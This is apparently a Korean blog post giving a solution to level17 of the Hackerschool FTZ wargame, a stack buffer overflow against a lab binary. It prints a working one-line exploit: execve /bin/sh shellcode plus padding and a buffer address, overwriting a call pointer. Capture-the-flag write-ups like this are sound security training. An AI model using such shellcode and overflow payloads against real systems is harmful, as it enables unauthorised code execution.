티스토리 뷰
level17의 힌트를 확인해보도록 하자.
이번에는 printit() 함수만 존재하고 shell함수가 별도로 존재하지 않는다.
스택에는 56바이트의 용량이 있는데 이때 call 포인터는 ebp에서 16바이트 떨어진 곳에 존재하기 때문에 buf에서 shellcode를 입력하여 call 포인터가 buf의 주소를 가리키도록 하면 된다.
$(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"A"*15+"[buf 메모리 주소]"';cat) | ./attackme
형식으로 입력하여 공격하면 된다.
'[Hackerschool] F.T.Z' 카테고리의 다른 글
| 해커스쿨 - level19 (0) | 2017.11.17 |
|---|---|
| 해커스쿨 - level18 (0) | 2017.11.16 |
| 해커스쿨 - level16 (0) | 2017.11.16 |
| 해커스쿨 - level15 (0) | 2017.11.16 |
| 해커스쿨 - level14 (0) | 2017.11.16 |
댓글